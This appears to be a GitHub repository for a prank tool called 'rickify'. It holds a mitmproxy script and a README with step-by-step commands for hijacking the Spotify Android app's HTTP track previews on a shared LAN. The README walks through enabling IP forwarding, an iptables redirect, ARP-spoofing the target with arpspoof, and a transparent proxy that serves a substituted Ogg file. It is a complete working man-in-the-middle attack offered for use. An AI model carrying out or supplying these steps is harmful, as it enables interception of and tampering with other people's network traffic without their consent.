├── f9z.png
├── rickroll.py
└── README.md


/f9z.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kjempelodott/rickify/HEAD/f9z.png


--------------------------------------------------------------------------------
/rickroll.py:
--------------------------------------------------------------------------------
 1 | from mitmproxy import http
 2 | 
 3 | def request(flow):
 4 |     if flow.request.path.startswith('/head/'):
 5 |         OGG = open('nevergonna.ogg', 'rb').read()
 6 |         SIZE = str(len(OGG))
 7 |         flow.response = http.HTTPResponse.make(
 8 |             200,
 9 |             OGG,
10 |             {'Content-Type'  : 'application/octet-stream',
11 |              'Content-Length': SIZE})
12 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ![](https://github.com/kjempelodott/rickify/blob/master/f9z.png)
 2 | 
 3 | The Spotify app for Android streams the first few seconds of a track over HTTP. Being on the same LAN as your target, this can easily be pwned. It turns out the Spotify app for Android will happily accept and play any Ogg-file.
 4 | 
 5 | **Notes:**
 6 | * This will not work with IPv6
 7 | * This will not work for already cached/downloaded tracks
 8 | 
 9 | ## We know the game and we're gonna play it
10 | 
11 | Install the required tools:
12 | 
13 | ```
14 | apt-get install dsniff
15 | pip install mitmproxy
16 | ```
17 | 
18 | ## You know the rules and so do I
19 | 
20 | Turn on port forwarding and forward HTTP traffic to port 8080:
21 | 
22 | ```
23 | sysctl -w net.ipv4.ip_forward=1
24 | iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
25 | ```
26 | 
27 | ## A full commitment's what I'm thinking of
28 | 
29 | Identify the gateway and the target IP address. Use Wireshark or whatever. Then trick your target device into sending all traffic to you instead of the gateway:
30 | 
31 | ```
32 | arpspoof -t [target ip] [gateway ip] # e.g. -t 192.168.1.101 192.168.1.1
33 | ```
34 | 
35 | ## You wouldn't get this from any other guy
36 | 
37 | Get a copy of *Never Gonna Give You Up* in Ogg-format. You probably have to change the filename in line 5 in *rickroll.py*. Setup a transparent proxy on port 8080:
38 | 
39 | ```
40 | mitmproxy -T -p 8080 -s rickroll.py
41 | ```


--------------------------------------------------------------------------------